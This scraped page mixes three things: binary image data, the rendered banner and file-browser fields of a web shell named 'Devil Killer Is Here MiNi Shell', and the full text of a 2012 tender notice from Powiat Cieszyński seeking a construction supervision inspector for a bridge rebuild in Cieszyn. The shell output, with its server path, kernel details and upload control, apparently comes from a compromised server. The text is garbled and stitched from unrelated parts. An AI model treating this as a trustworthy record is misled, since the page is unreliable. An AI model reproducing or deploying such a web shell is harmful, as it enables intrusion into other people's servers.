JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120814/300130-N-2012.html

<p class="kh_header"><b>Cieszyn: Wybór Inspektora Nadzoru nad robotami budowlanymi przebudowy mostu nad rzeką Pucówką w ciągu Al. Jana Łyska w Cieszynie</b><br>
<b>Numer ogłoszenia: 300130 - 2012; data zamieszczenia: 14.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Cieszyński w imieniu którego występuje Zarząd Powiatu Cieszyńskiego , ul. Bobrecka 29, 43-400 Cieszyn, woj. śląskie, tel. 33 4777213, faks 33 4777133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.cieszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Inspektora Nadzoru nad robotami budowlanymi przebudowy mostu nad rzeką Pucówką w ciągu Al. Jana Łyska w Cieszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia polega na pełnieniu funkcji Inspektora Nadzoru nad robotami budowlanymi przebudowy mostu nad rzeką Pucówką w ciągu Al. Jana Łyska w Cieszynie, w tym:
1.1. rozbiórka istniejącego mostu nad rzeką Puńcówką w ciągu Al. Jana Łyska wraz z elementami wyposażenia i nawierzchni (km potoku 0+880,0);
1.2. budowa nowego obiektu w km 0+098,43 Al. Jana Łyska nad rzeką Puńcowką (km potoku 0+880,0);
1.3. budowa murków regulacyjnych na rzece Puńcówce w rejonie obiektu.
1.4. przebudowa skrzyżowań:
-  z ul. Stefana Żeromskiego w km 0+089,81;
- z ul. Błogocką w km 0+138,2;
1.5. budowa zatok autobusowych:
- przy Al. Jana Łyska w km 0+016,81 oraz w km 0+050,59;
- przy ul. Stefana Żeromskiego w km 0+042,71;
1.6. przebudowa/budowa chodników: 
a) wzdłuż Al. Jana Łyska:
- chodnik prawostronny w km od 0+007,39 do 0+180,79;
- chodnik lewostronny w km od 0+000,00 do 0+209,29;
b) wzdłuż ul. Stefana Żeromskiego chodnik obustronny w km od 0+000,00 do 0+090,81;
c) wzdłuż ul. Błogockiej:
- chodnik prawostronny w km od 0+000,0 do 0+023,24;
- chodnik lewostronny w km od 0+000,00 do 0+018,58;
d) chodnik na skwerze łączący Al. Jana Łyska z ul. Błogocką;
1.7. budowa wylotów W1 w km 0+994 oraz W2 w km0+893 oraz przebudowa kanalizacji deszczowej:
-  od km 0+046,12 ul. Żeromskiego do 0+047,13 ul. Żeromskiego;
- od km 0+078,10 Al. J. Łyska do wylotu W1 w km 0+994 rz. Puńcówki;
- od km 0+201,32 Al. J. Łyska do wylotu W2 w km 0+893 rz. Puńcowki;
1.8. przebudowa sieci elektroenergetycznej:
- napowietrzna sieć energetyczna: od km 0+033,80 do km 0+108,72 Al. Jana Łyska;
- sieć energetyczna 15kV od km od km 0+012,90 ul. Żeromskiego do km 0+109,82 Al. Jana Łyska;
1.9. przebudowa sieci teletechnicznej:
-  napowietrzna sieć teletechniczna: od km 0+031,41 Al. Łyska do km 0+119,99 Al. Łyska;
-  sieć teletechniczna od km 0+069,01 ul. Żeromskiego do km 0+072,27 
Al. Łyska;
1.10. przebudowa sieci wodociągowej:
- fi 300 od km 0+015,41 ul. Żeromskiego do km 0+082,99 Al. J. Łyska;
- fi 100 od km 0+011,87 ul. Żeromskiego do km 0+112,95 Al. J. Łyska;
1.11. przebudowa sieci gazowej: 
- od km 0+075,57 Al. J. Łyska do km 0+088,49 ul. Żeromskiego;
1.12. budowa kładki tymczasowej dla pieszych wraz z dojściami oraz jej rozbiórkę po zakończeniu budowy;
Ponadto nadzorowanie i weryfikację innych elementów wchodzących w zakres zamówienia na roboty budowlane takich jak:
a) obsługę geodezyjną i pomiar geodezyjny powykonawczy;
b) opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z jego zatwierdzeniem;
c) opracowanie planu BIOZ.
2. Szczegółowy opis przedmiotu zamówienia zawarty został w specyfikacji istotnych warunków zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości: 1.000zł (słownie: tysiąc złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien jest udokumentować, że w okresie 3 lat przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie pełnił lub pełni nadzór inwestorski nad realizacją minimum dwóch inwestycji polegających na remoncie, przebudowie lub budowie  obiektu mostowego o łącznej wartości usługi nadzoru minimum 100.000,00 zł brutto oraz łącznej wartości robót mostowych minimum 1.400.000,00 zł, wraz z dokumentami potwierdzającymi że usługi zostały wykonane lub wykonywane należycie.
W przypadku, gdy w nazwie zadania wskazanego w celu potwierdzenia warunków udziału w postępowaniu lub opisie przedmiotu zamówienia w wykazie wykonanych robót budowlanych stanowiącym zał. nr 6 do SIWZ lub dokumentach potwierdzających należyte wykonanie tych robót, zakres robót określony został słowem innym niż budowa, rozbudowa lub przebudowa, Wykonawca winien do dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, załączyć dodatkowo oświadczenie, że zakres prac wykonanych przy realizacji przedmiotowego zadania jest zgodny z wymaganiami Zamawiającego i odpowiada definicji przebudowy lub budowy lub rozbudowy w rozumieniu ustawy Prawo budowlane, tj. odpowiada rodzajowi robót stanowiących przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować wykwalifikowanym personelem, który posiada doświadczenie i uprawnienia do kierowania robotami budowlanymi w następujących specjalnościach:1.Inspektor nadzoru, Inspektor nadzoru robót mostowych -	Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności mostowej lub konstrukcyjno-budowlanej bez ograniczeń - 3 lata doświadczenia jako inspektor nadzoru robót mostowych w rozumieniu ustawy Prawo budowlane
2. Inspektor nadzoru robót drogowych - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno-budowlanej bez ograniczeń - 3 lata doświadczenia jako inspektor nadzoru robót drogowych w rozumieniu ustawy Prawo budowlane 3. Asystent Inspektora nadzoru - Wykształcenie średnie lub  wyższe budowlane - 2 lata doświadczenia jako inżynier budowy 
lub 1 rok doświadczenia jako kierownik budowy w branży mostowej, kierownik robót mostowych lub inspektor nadzoru robót mostowych w rozumieniu ustawy Prawo budowlane 4. Inspektor nadzoru robót instalacyjnych- w zakresie 
sieci wodociągowych i kanalizacji deszczowej -	Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacji deszczowych - 2 lata doświadczenia inspektor nadzoru  w rozumieniu ustawy Prawo budowlane  w branży instalacyjnej w zakresie sieci wodociągowych i kanalizacji deszczowej 5. Inspektor nadzoru robót instalacyjnych- w zakresie sieci 
gazowych -	Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w  zakresie sieci gazowych	- 2 lata doświadczenia jako inspektor nadzoru  w rozumieniu ustawy Prawo budowlane  w branży instalacyjnej w zakresie sieci gazowych 6.Inspektor nadzoru robót teletechnicznych - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej - 2 lata doświadczenia jako inspektor nadzoru robót telekomunikacyjnych w rozumieniu ustawy Prawo budowlane 7. Inspektor nadzoru robót elektrycznych - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych - 2 lata doświadczenia jako inspektor nadzoru robót elektrycznych w rozumieniu ustawy Prawo budowlane 8. Weryfikator dokumentacji projektowej - Uprawnienia budowlane
do kierowania robotami budowlanymi w specjalności mostowej i drogowej lub konstrukcyjno-budowlanej bez ograniczeń	- 2 lata doświadczenia jako kierownik budowy, kierownik robót mostowych lub jako inspektor nadzoru robót mostowych w rozumieniu ustawy Prawo budowlane oraz 2 lata doświadczenia jako kierownik budowy, kierownik robót drogowych lub jako inspektor nadzoru robót drogowych w rozumieniu ustawy Prawo budowlane. 

Na stanowisko: Inspektor nadzoru robót instalacyjnych w zakresie sieci wodociągowych i kanalizacji deszczowej można wskazać dwie osoby - w zależności od posiadanych uprawnień oraz doświadczenia.

Na stanowisko: Weryfikator dokumentacji projektowej można wskazać dwie osoby - w zależności od posiadanych uprawnień oraz doświadczenia.

Uwaga:
- Wykonawca zobowiązany jest do zapewnienia obsługi zadania przez wskazane w ofercie osoby. 
- W trakcie realizacji zadania Zamawiający wymaga codziennego pobytu Inspektora nadzoru na budowie w czasie trwania robót i stałego pobytu na budowie Asystenta Inspektora nadzoru w czasie trwania robót. Ponadto czas pracy zespołu Inspektora nadzoru winien zostać dostosowany do czasu pracy wykonawcy robót, zakłada się w tym okresie ciągły pobyt pracowników przewidzianych do bezpośredniego nadzorowania robót na budowie oraz w zależności od potrzeb innych pracowników. 
- Zmiany personalne w stosunku do stanowisk wskazanych w ofercie są możliwe po zatwierdzeniu ich przez Zamawiającego.
- Zamawiający nie dopuszcza łączenia kilku stanowisk za wyjątkiem:
- osoby wskazanej na stanowisko 1) i 2) - te dwa stanowiska mogą być łączone, jednakże dla osoby, która będzie ewentualnie pełnić łączoną funkcję, należy wykazać wymagane doświadczenie w latach dla każdej z pełnionych funkcji oddzielnie
- osoby wskazanej na stanowisko 4) i 5) - te dwa stanowiska mogą być łączone, jednakże dla osoby, która będzie ewentualnie pełnić łączoną funkcję, należy wykazać wymagane doświadczenie w latach dla każdej z pełnionych funkcji oddzielnie.
- osoby wskazanej na stanowisko 6) i 7) - te dwa stanowiska mogą być łączone, jednakże dla osoby, która będzie ewentualnie pełnić łączoną funkcję, należy wykazać wymagane doświadczenie w latach dla każdej z pełnionych funkcji oddzielnie.
- Dla wskazanych w powyższej tabeli osób Wykonawca winien oświadczyć że osoby wskazane na poszczególne stanowisko/a posiadają wymagane uprawnienia jeśli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca dysponuje własnymi środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu) w wysokości min. 55.000 zł,
- Wykonawca posiada opłaconą polisę od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w tym działalności związanej z przedmiotem niniejszego zamówienia na wartość nie mniejszą niż 11.000zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy, - oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 uPzp, - jeżeli Wykonawca zamierza powierzyć Podwykonawcy do wykonania część usługi powinien on złożyć oświadczenie Wykonawcy o zakresie usług do wykonania przez Podwykonawcę, - dokumenty w zakresie umocowania prawnego do podpisywania oferty, zgodnie z pkt 10.7 SIWZ, - kserokopie wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie przepisu art. 144 ust. 1 uPzp Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do oferty, w następujących przypadkach i na następujących zasadach, za obopólną zgodą stron:
2 Zmiany ogólne :
A. 	Możliwa jest:
a)	zmiana adresu  / siedziby Zamawiającego / Wykonawcy,
b)	zmiana osób występujących po stronie Zamawiającego / Wykonawcy,
c)	zmiana będąca skutkiem poprawy omyłki oczywistej.
B.	Nie jest dopuszczalna zmiana Wykonawcy, z wyjątkiem sukcesji generalnej, przekształcenia, dziedziczenia spółek handlowych zgodnie z ksh, sukcesji z mocy prawa.

3. Zmiany rzutujące na termin wykonania umowy oraz/lub wynagrodzenie:
A. 	Możliwe jest przedłużenie terminu zakończenia umowy, w przypadku opóźnienia w przekazaniu dokumentów budowy, wynikającego z przyczyn leżących po stronie Zamawiającego.
B. 	Możliwa jest zmiana terminu wykonania umowy, ewentualne wstrzymanie lub wznowienie usług oraz/lub zmiana wynagrodzenia, ze względu na:
a)	wstrzymanie wykonywania robót budowlanych stanowiących przedmiot nadzoru inwestorskiego, w tym wynikające m.in. z:
- opóźnienia spowodowanego przez urzędy (konieczność uzyskania niezbędnych opinii bądź decyzji administracyjnych)
- uwarunkowania społeczne np. protesty, petycje, itp.
- konieczność prowadzenia uzgodnień z właścicielami urządzeń obcych lub właścicielami nieruchomości,
- konieczność uwzględnienia warunków uzgodnień z właścicielami urządzeń obcych lub właścicielami nieruchomości,
b)	przedłużenie procedury przetargowej,
c)	zmiany stanu prawnego,
d)	wydłużenie terminu realizacji umowy z Wykonawcą robót, bądź przekroczenie przez Wykonawcę terminu zakończenia robót,
e)	zmianę stawki podatku od towarów i usług (VAT),
f)	obniżenie kosztów wykonania usług a tym samym wynagrodzenia Wykonawcy,
g)	rezygnację z części usług,
C. Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy jeżeli przedłużenie wynika z przyczyn leżących po stronie Wykonawcy.
4 Określa się następujący tryb dokonywania zmian postanowień umowy:
1)	  sposób inicjowania zmian:
a)	Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany,
b)	 Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany.
2)	Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach takich jak notatka służbowa, pismo Wykonawcy lub Zamawiającego, protokół konieczności itp.
3)	W rezultacie dokonania czynności opisanych w pkt. 1) i 2) może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotowuje Zamawiający.
26.5 Wszelkie postanowienia zawarte w §13 powinny być interpretowane z uwzględnieniem treści Dyrektywy Parlamentu Europejskiego i Rady Nr 2004/18/WE z dnia 31 marca 2004r. w sprawie koordynacji procedur udzielania zamówień publicznych na roboty budowlane, dostawy i usługi (Dz.U. WE seria L, nr 134 z dnia 30 kwietnia 2004r, z późn. zm)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.cieszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn, pokój 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2012 godzina 09:00, miejsce: Kancelaria Ogólna Starostwa Powiatowego w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn.</p>
